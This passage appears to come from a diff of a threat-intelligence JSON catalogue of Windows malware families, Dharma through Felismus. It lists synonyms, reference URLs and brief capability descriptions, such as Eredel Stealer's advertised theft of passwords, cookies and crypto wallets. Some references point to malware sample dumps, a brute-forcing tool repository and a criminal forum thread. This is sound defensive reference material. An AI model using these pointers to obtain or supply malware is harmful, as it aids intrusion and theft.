"9c90b876-e94d-4ea5-9f30-fdc6dd6b5aef", - "value": "Dharma", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Crystal", - "Gorynych", - "Gorynch" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox", - "https://www.scmagazine.com/inside-diamondfox/article/578478/", - "https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/", - "https://blog.malwarebytes.com/threat-analysis/2017/04/diamond-fox-p2/", - "http://blog.checkpoint.com/2017/05/10/diamondfox-modular-malware-one-stop-shop/", - "https://blog.cylance.com/a-study-in-bots-diamondfox" - ] - }, - "uuid": "7368ab0c-ef4b-4f53-a746-f150b8afa665", - "value": "DiamondFox", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dimnie", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-dimnie-hiding-plain-sight/" - ] - }, - "uuid": "8f5ce8a6-c5fe-4c62-b25b-6ce0f3b724c5", - "value": "Dimnie", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt", - "https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/", - "https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf" - ] - }, - "uuid": "61b2dd12-2381-429d-bb64-e3210804a462", - "value": "DirCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack", - "https://www.codeandsec.com/Sophisticated-CyberWeapon-Shamoon-2-Malware-Analysis", - "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/?adbsc=social68389776&adbid=804134348374970368&adbpl=tw&adbpr=4487645412", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "http://www.vinransomware.com/blog/detailed-threat-analysis-of-shamoon-2-0-malware", - "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/", - "http://contagiodump.blogspot.com/2012/08/shamoon-or-disttracka-samples.html" - ] - }, - "uuid": "25d03501-1fe0-4d5e-bc75-c00fbdaa83df", - "value": "DistTrack", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker", - "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/", - "https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/", - "https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/" - ] - }, - "uuid": "1248cdf7-4180-4098-b1d0-389aa523a0ed", - "value": "DMA Locker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnsmessenger", - "https://blog.talosintelligence.com/2017/03/dnsmessenger.html", - "http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/", - "https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html" - ] - }, - "uuid": "b376580e-aba1-4ac9-9c2d-2df429efecf6", - "value": "DNSMessenger", - "description": "DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker." - }, - { - "meta": { - "synonyms": [ - "Shelma" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower", - "http://www1.paladion.net/hubfs/Newsletter/DogHousePower-%20Newly%20Identified%20Python-Based%20Ransomware.pdf" - ] - }, - "uuid": "14d3518a-d8cb-4fbd-80aa-8bec4fc8ad13", - "value": "DogHousePower", - "description": "DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorkbot_ngrbot", - "https://securingtomorrow.mcafee.com/mcafee-labs/ngrbot-spreads-via-chat/", - "http://stopmalvertising.com/rootkits/analysis-of-ngrbot.html", - "https://research.checkpoint.com/dorkbot-an-investigation/" - ] - }, - "uuid": "91191c0a-96d8-40b8-b8fb-daa0ad009c87", - "value": "NgrBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dorshel", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711", - "value": "Dorshel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar", - "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/", - "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", - "https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/", - "https://countercept.com/our-thinking/doublepulsar-usermode-analysis-generic-reflective-dll-loader/" - ] - }, - "uuid": "32984744-c0f9-43f7-bfca-c3276248a4fa", - "value": "DoublePulsar", - "description": "" - }, - { - "meta": { - "synonyms": [ - "DELPHACY" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downdelph", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf" - ] - }, - "uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2", - "value": "Downdelph", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/?adbsc=social69739136&adbid=826218465723756545&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "c8149b45-7d28-421e-bc6f-25c4b8698b92", - "value": "Downeks", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper", - "http://www.clearskysec.com/charmingkitten/" - ] - }, - "uuid": "227862fd-ae83-4e3d-bb69-cc1a45a13aed", - "value": "DownPaper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dramnudge" - ] - }, - "uuid": "627a044b-1c84-409c-9f58-95b46d5d51ba", - "value": "DramNudge", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.proofpoint.com/us/threat-insight/post/ursnif-variant-dreambot-adds-tor-functionality" - ] - }, - "uuid": "ac4fbbb0-9a21-49ce-be82-e44cb02a7819", - "value": "DreamBot", - "description": "2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n2014 Dreambot (Gozi ISFB variant)\r\n\r\nIn 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.\r\n\r\nSee win.gozi for additional historical information." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", - "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", - "https://blogs.it.ox.ac.uk/oxcert/2015/11/09/major-dridex-banking-malware-outbreak/", - "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", - "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", - "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", - "https://viql.github.io/dridex/", - "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", - "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" - ] - }, - "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", - "value": "Dridex", - "description": "OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/", - "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/" - ] - }, - "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", - "value": "DROPSHOT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtbackdoor" - ] - }, - "uuid": "cc5abb0c-7f33-4a82-a92e-0070fd602ba5", - "value": "DtBackdoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", - "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" - ] - }, - "uuid": "8269e779-db23-4c94-aafb-36ee94879417", - "value": "DualToy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", - "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/", - "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", - "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", - "https://labs.bitdefender.com/wp-content/uploads/downloads/inexsmar-an-unusual-darkhotel-campaign/" - ] - }, - "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", - "value": "DarkHotel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", - "https://github.com/ch0sys/DUBrute" - ] - }, - "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", - "value": "DUBrute", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" - ] - }, - "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", - "value": "Dumador", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" - ] - }, - "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", - "value": "DuQu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", - "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group" - ] - }, - "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", - "value": "Duuzer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Dyreza" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", - "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", - "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", - "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf" - ] - }, - "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", - "value": "Dyre", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", - "https://twitter.com/JaromirHorejsi/status/815861135882780673" - ] - }, - "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", - "value": "EDA2", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", - "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" - ] - }, - "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", - "value": "EHDevel", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - }, - "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", - "value": "Elirks", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", - "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", - "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.joesecurity.org/blog/8409877569366580427" - ] - }, - "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", - "value": "Elise", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", - "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", - "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", - "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html" - ] - }, - "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", - "value": "Emdivi", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.empire_downloader", - "https://twitter.com/thor_scanner/status/992036762515050496" - ] - }, - "uuid": "aa445513-9616-4f61-a72d-7aff4a10572b", - "value": "Empire Downloader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Lurid" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal", - "https://www.bsk-consulting.de/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/", - "http://la.trendmicro.com/media/misc/lurid-downloader-enfal-report-en.pdf", - "https://researchcenter.paloaltonetworks.com/2015/05/cmstar-downloader-lurid-and-enfals-new-cousin/" - ] - }, - "uuid": "2a4cacb7-80a1-417e-8b9c-54b4089f35d9", - "value": "Enfal", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationdrug", - "http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/", - "https://securelist.com/inside-the-equationdrug-espionage-platform/69203/", - "https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - }, - "uuid": "c4490972-3403-4043-9d61-899c0a440940", - "value": "EquationDrug", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.equationgroup", - "https://laanwj.github.io/2016/09/23/seconddate-adventures.html", - "https://laanwj.github.io/2016/09/17/seconddate-cnc.html", - "https://laanwj.github.io/2016/09/13/blatsting-rsa.html", - "https://laanwj.github.io/2016/09/11/buzzdirection.html", - "https://laanwj.github.io/2016/09/09/blatsting-lp-transcript.html", - "https://laanwj.github.io/2016/09/04/blatsting-command-and-control.html", - "https://laanwj.github.io/2016/09/01/tadaqueos.html", - "https://laanwj.github.io/2016/08/28/feintcloud.html", - "https://laanwj.github.io/2016/08/22/blatsting.html" - ] - }, - "uuid": "35c1abaf-8dee-48fe-8329-f6e5612eb7af", - "value": "Equationgroup (Sorting)", - "description": "Rough collection EQGRP samples, to be sorted" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus", - "https://www.bleepingcomputer.com/news/security/erebus-ransomware-utilizes-a-uac-bypass-and-request-a-90-ransom-payment/" - ] - }, - "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", - "value": "Erebus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eredel", - "https://webcache.googleusercontent.com/search?q=cache:3hU62-Lr2t8J:hXXps://www.nulled.to/topic/486274-eredel-stealer-lite-private-having-control-via-the-web-panel-multifunctional-stealer/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-ab" - ] - }, - "uuid": "acd2555d-b4a1-47b4-983a-fb7b3a402dab", - "value": "Eredel", - "description": "Eredel Stealer is a low price malware that allows for extracting passwords, cookies, screen desktop from browsers and programs.\r\n\r\nAccording to nulled[.]to:\r\n\r\nSupported browsers\r\nChromium Based: Chromium, Google Chrome, Kometa, Amigo, Torch, Orbitum, Opera, Opera Neon, Comodo Dragon, Nichrome (Rambler), Yandex Browser, Maxthon5, Sputnik, Epic Privacy Browser, Vivaldi, CocCoc and other Chromium Based browsers.\r\n\r\n- Stealing FileZilla\r\n- Stealing an account from Telegram\r\n- Stealing AutoFill\r\n- Theft of wallets: Bitcoin | Dash | Monero | Electrum | Ethereum | Litecoin\r\n- Stealing files from the desktop. Supports any formats, configurable via telegram-bot" - }, - { - "meta": { - "synonyms": [ - "ExPetr", - "Pnyetya", - "Petna", - "NotPetya", - "Nyetya", - "NonPetya", - "nPetya", - "Diskcoder.C", - "BadRabbit" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eternal_petya", - "https://securelist.com/schroedingers-petya/78870/", - "https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/", - "https://securelist.com/from-blackenergy-to-expetr/78937/", - "https://medium.com/@thegrugq/pnyetya-yet-another-ransomware-outbreak-59afd1ee89d4", - "https://tisiphone.net/2017/06/28/why-notpetya-kept-me-awake-you-should-worry-too/", - "https://labsblog.f-secure.com/2017/06/29/petya-i-want-to-believe/", - "http://blog.erratasec.com/2017/06/nonpetya-no-evidence-it-was-smokescreen.html", - "https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-lost-salsa20-key/", - "https://www.bleepingcomputer.com/news/security/ransomware-attacks-continue-in-ukraine-with-mysterious-wannacry-clone/", - "http://blog.talosintelligence.com/2017/06/worldwide-ransomware-variant.html", - "https://labsblog.f-secure.com/2017/06/30/eternal-petya-from-a-developers-perspective/", - "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/", - "https://isc.sans.edu/forums/diary/Checking+out+the+new+Petya+variant/22562/", - "https://blog.malwarebytes.com/threat-analysis/2017/06/eternalpetya-yet-another-stolen-piece-package/", - "https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/", - "https://www.gdatasoftware.com/blog/2017/07/29859-who-is-behind-petna", - "https://www.crowdstrike.com/blog/fast-spreading-petrwrap-ransomware-attack-combines-eternalblue-exploit-credential-stealing/", - "https://www.crowdstrike.com/blog/petrwrap-technical-analysis-part-2-further-findings-and-potential-for-mbr-recovery/", - "https://www.theguardian.com/technology/2017/jul/03/notpetya-malware-attacks-ukraine-warrant-retaliation-nato-researcher-tomas-minarik", - "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", - "https://threatpost.com/ukrainian-man-arrested-charged-in-notpetya-distribution/127391/", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/eternalglue-part-one-rebuilding-notpetya-to-assess-real-world-resilience/", - "https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/?utm_content=buffer8ffe4&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer", - "https://securelist.com/bad-rabbit-ransomware/82851/", - "https://www.wired.com/story/badrabbit-ransomware-notpetya-russia-ukraine/", - "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/", - "http://blog.talosintelligence.com/2017/10/bad-rabbit.html", - "http://www.intezer.com/notpetya-returns-bad-rabbit/", - "https://www.riskiq.com/blog/labs/badrabbit/", - "https://www.fireeye.com/blog/threat-research/2017/10/backswing-pulling-a-badrabbit-out-of-a-hat.html", - "https://labsblog.f-secure.com/2017/10/27/the-big-difference-with-bad-rabbit/", - "https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-badrabbit-encryption-routine-specifics.html", - "https://www.washingtonpost.com/world/national-security/russian-military-was-behind-notpetya-cyberattack-in-ukraine-cia-concludes/2018/01/12/048d8506-f7ca-11e7-b34a-b85626af34ef_story.html" - ] - }, - "uuid": "6f736038-4f74-435b-8904-6870ee0e23ba", - "value": "EternalPetya", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HighTide" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2014/06/ASERT-Threat-Intelligence-Brief-2014-07-Illuminating-Etumbot-APT.pdf", - "https://www.zscaler.com/blogs/research/cnacom-open-source-exploitation-strategic-web-compromise", - "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" - ] - }, - "uuid": "91af1080-6378-4a90-ba1e-78634cd31efe", - "value": "EtumBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny", - "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope", - "https://www.cyphort.com/evilbunny-malware-instrumented-lua/" - ] - }, - "uuid": "dc39dcdf-50e7-4d55-94a0-926853f344f3", - "value": "Evilbunny", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Vidgrab" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilgrab", - "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf" - ] - }, - "uuid": "438c6d0f-03f0-4b49-89d2-40bf5349c3fc", - "value": "EvilGrab", - "description": "" - }, - { - "meta": { - "synonyms": [ - "CREstealer" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony", - "https://techhelplist.com/spam-list/1104-2017-03-27-your-amazon-com-order-has-shipped-malware", - "https://threatpost.com/docusign-phishing-campaign-includes-hancitor-downloader/125724/", - "https://www.s21sec.com/en/blog/2017/07/ramnit-and-its-pony-module/" - ] - }, - "uuid": "e26579d9-1d93-4a3b-a41e-263254d85189", - "value": "EvilPony", - "description": "Privately modded version of the Pony stealer." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.evrial", - "https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/" - ] - }, - "uuid": "af3a3ece-e67f-457a-be72-7651bc720342", - "value": "Evrial", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Sabresac", - "Saber" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.excalibur", - "https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies" - ] - }, - "uuid": "3cec2c3c-1669-40cf-8612-eb826f7d2c98", - "value": "Excalibur", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.exchange_tool", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", - "https://github.com/nccgroup/Royal_APT" - ] - }, - "uuid": "74f8db32-799c-41e5-9815-6272908ede57", - "value": "MS Exchange Tool", - "description": "" - }, - { - "meta": { - "synonyms": [ - "ExtRat" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat", - "https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html", - "https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017", - "https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat" - ] - }, - "uuid": "6ec2b6b1-c1a7-463a-b135-edb51764cf38", - "value": "Xtreme RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid", - "https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/", - "http://blog.talosintel.com/2017/01/Eye-Pyramid.html" - ] - }, - "uuid": "a7489029-21d4-44c9-850a-8f656a98cb22", - "value": "Eye Pyramid", - "description": "" - }, - { - "meta": { - "synonyms": [ - "WillExec" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakedga", - "https://github.com/360netlab/DGA/issues/36", - "http://blog.talosintelligence.com/2017/10/threat-round-up-1020-1017.html", - "http://www.freebuf.com/column/153424.html" - ] - }, - "uuid": "31c248cb-51b5-4bb7-801f-d8520d2b5789", - "value": "FakeDGA", - "description": "According to Talos, this trojan injects into other processes, disables security features and tries to contact several domains, waiting for instruction.\r\n\r\nThere seem to be two versions of this malware: one with the FakeDGA-domains in plaintext, and one with AES-ECB-encrypted domains (using the Windows-API)." - }, - { - "meta": { - "synonyms": [ - "Braviax" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean", - "https://blog.threattrack.com/fakerean-comes-of-age-turns-hard-core/", - "https://0x3asecurity.wordpress.com/2015/11/30/134260124544/", - "https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf", - "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv" - ] - }, - "uuid": "653df134-88c9-47e2-99a5-06e0406ab6d4", - "value": "FakeRean", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc", - "http://www.welivesecurity.com/2015/07/30/operation-potao-express/" - ] - }, - "uuid": "6b0030bc-6e45-43b0-9175-15fe8fbd0942", - "value": "FakeTC", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny", - "https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1" - ] - }, - "uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e", - "value": "Fanny", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt", - "https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/" - ] - }, - "uuid": "29f4ae5a-4ccd-451b-bd3e-d301865da034", - "value": "FantomCrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos", - "http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/", - "http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf" - ] - }, - "uuid": "1bf03bbb-d3a2-4713-923b-218186c86914", - "value": "FastPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus", - "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" - ] - }, - 